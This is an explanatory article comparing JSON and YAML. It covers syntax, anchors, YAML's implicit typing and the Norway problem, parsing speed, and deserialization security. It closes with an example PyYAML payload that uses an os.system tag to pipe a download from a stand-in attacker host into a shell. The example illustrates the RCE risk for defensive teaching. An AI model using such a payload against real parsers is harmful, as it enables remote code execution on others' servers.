JSON vs YAML

JSON relies on strict, explicit syntax markers: double quotes for keys, brackets `[]` for arrays, braces `{}` for objects, and commas `,` separating items. Trailing commas are strictly prohibited, and comments are not supported by the standard. This rigidity makes JSON highly deterministic and trivial to write parsers for, but also brittle to maintain manually.

YAML uses significant whitespace and indentation (spaces only, no tabs) to denote structure. It supports flow style (braces and brackets similar to JSON) and block style (indented lists and key-value pairs). Unlike JSON, YAML supports block-level strings (using `|` to preserve newlines or `>` to fold them), comments (`#`), and raw typing tags (e.g. `!!str`, `!!int`). One key feature of YAML is the ability to create anchors (`&`) and aliases (`*`) to reuse duplicate blocks of data, reducing code duplication in large configuration trees.

# YAML configuration with comments and anchors
database: &db_config
  host: localhost
  port: 5432
  user: admin
  timeout: 30s

development:
  <<: *db_config
  database_name: dev_db
  debug: true

production:
  <<: *db_config
  database_name: prod_db
  debug: false

YAML's desire to be user-friendly led to a complex implicit typing system that automatically converts string values into booleans, numbers, or dates if they match specific patterns. In YAML 1.1, the tokens `yes`, `no`, `y`, `n`, `on`, and `off` are parsed as boolean values rather than strings.

This created the famous "Norway Problem." If a developer lists ISO-3166 country codes in a YAML file, the country code for Norway (`NO`) is silently parsed as the boolean `false`. Runtimes attempting to read this list will encounter a boolean value where a two-letter string was expected, leading to application crashes or incorrect records. Fixing this requires wrapping the country code in quotes (`"NO"`). JSON does not suffer from such parser ambiguities because it only allows explicit booleans (`true`, `false`) and strictly requires all string literals to be wrapped in double quotes.

Because JSON has a simple, regular grammar, parsing it requires minimal state tracking. Modern JavaScript runtimes compile JSON parsing to native engine functions (`JSON.parse`) that process megabytes of data in milliseconds. The syntax is deterministic, allowing streaming parsers to read keys and values with constant memory overhead.

YAML parsing is vastly more CPU and memory intensive. The parser must track indentation depth, whitespace states, block formatting switches, custom tags, and reference anchors. Resolving anchors requires the parser to cache objects in memory to expand them later, which can cause significant heap allocation. In benchmark suites, parsing YAML is consistently 10 to 100 times slower than parsing the equivalent JSON structure. For high-volume web servers processing API payloads, using YAML as the transport format introduces unnecessary latency and CPU bottleneck risks.

JSON is inherently safe from arbitrary execution attacks because it can only represent primitives: strings, numbers, booleans, nulls, arrays, and objects. The parser cannot be coerced into instantiating arbitrary classes or calling methods on the host platform (unless using unsafe custom deserializers).

YAML supports custom tags (`!!`), which allow developers to specify that a parser should instantiate a specific class or object type during deserialization. In language environments like Python (e.g. PyYAML), Ruby, and Java, this feature has historically been exploited for Remote Code Execution (RCE). An attacker sends a malicious YAML payload containing a class constructor tag (like `!!python/object/apply:os.system`), and the parser executes arbitrary system commands. Runtimes must use safe loading functions (e.g. `yaml.safe_load` in Python) to mitigate this vector. Additionally, malicious YAML payloads can include self-referencing anchors that form an exponential loop (known as the "Billion Laughs" or "YAML bomb" attack), causing the parser to exhaust memory and crash the server.

# Example of a dangerous YAML object instantiation (PyYAML unsafe load)
!!python/object/apply:os.system
args: ['curl http://attacker.com/malware | sh']